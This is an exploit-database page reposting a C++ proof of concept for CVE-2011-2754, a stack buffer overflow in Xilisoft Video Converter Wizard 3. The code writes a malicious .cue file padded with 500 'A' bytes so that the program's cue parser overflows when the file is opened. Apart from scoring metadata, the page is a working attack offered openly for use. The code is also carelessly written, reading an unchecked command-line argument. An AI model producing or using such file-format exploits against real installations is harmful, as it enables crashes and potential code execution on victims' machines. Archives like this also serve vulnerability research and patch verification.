Advertisement






Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow PoC

CVE Category Price Severity
CVE-2011-2754 CWE-119 $0 High
Author Risk Exploitation Type Date
Richard James High Local 2009-04-28
CVSS EPSS EPSSP
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009040227

Below is a copy:

/*
----------------------------------------------------------------------------------------
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC

name: xilisoft.cpp

Credits : fl0 fl0w
----------------------------------------------------------------------------------------
ScreanShot in the debugger

Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
----------------------------------------------------------------------------------------
*/

//Start

#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

#define     SIZE 100000

#define     FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.."  

class EXPLOIT {
public:

int check (char *, char *);
void Usage (char *);
 };
 
static int  Poz = 1;
static int  Neg = 0;
  
int i;      

char Name [SIZE];    
char NeWbuff [SIZE];
                                            

                                                  int main (int argc, char *argv [])                                                                                           

 { 
         
        EXPLOIT VIDEO;
        
             
             if ( argc < 2) 
             
                VIDEO.Usage ( argv [0]); 
       
                                                  if ( VIDEO.check ( argv [1], "-file") == Neg) { 
                                                   
                                                       fprintf ( stdout , " Incorect input "); 
                                                       
                                                       printf ( " \t..Usage is %s -file filename.. \n", Name);
                                                                                                                              
                                                               exit ( 0);
                                                            
                                                            }
                                               
                                                                                 
        
        
          do {
        
            NeWbuff [i] = 'A';
         
            i++;
               
            }while (i < 500);
               
       
        
        FILE *f;
        
        strcpy (Name, argv [2]);
        
        strcat (Name, " .cue ");
        
        f = fopen (Name, "w");
        
        assert ( f != NULL);
        
        
        
        
        strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF)); 
                                                                 
          
        
        fputs("FILE \"", f);
        
        fprintf ( f, " %s ", NeWbuff);
               
                
        fprintf ( stdout , "File build ! ");
         
        exit ( 0);  
         
       getchar ();
       
                                                   return 0;        
                                                  }
                                                                                                    

                                                         
  
                                                  int EXPLOIT::check (char *Arg_, char *_Arg)
   
   {
        
       if ( strcmp ( Arg_, _Arg) == 0)
       
        return Poz;
        
      return Neg;
        
        }   
        
    void EXPLOIT::Usage (char *Name)
    
   {
     system ("cls");    
     fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n ");
     printf ( " \t..Usage is %s -file filename.. \n", Name);    
     fprintf ( stdout , "..All Credits fl0 fl0w.. \n");
     
     
         }   
         
        
//EOF           



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.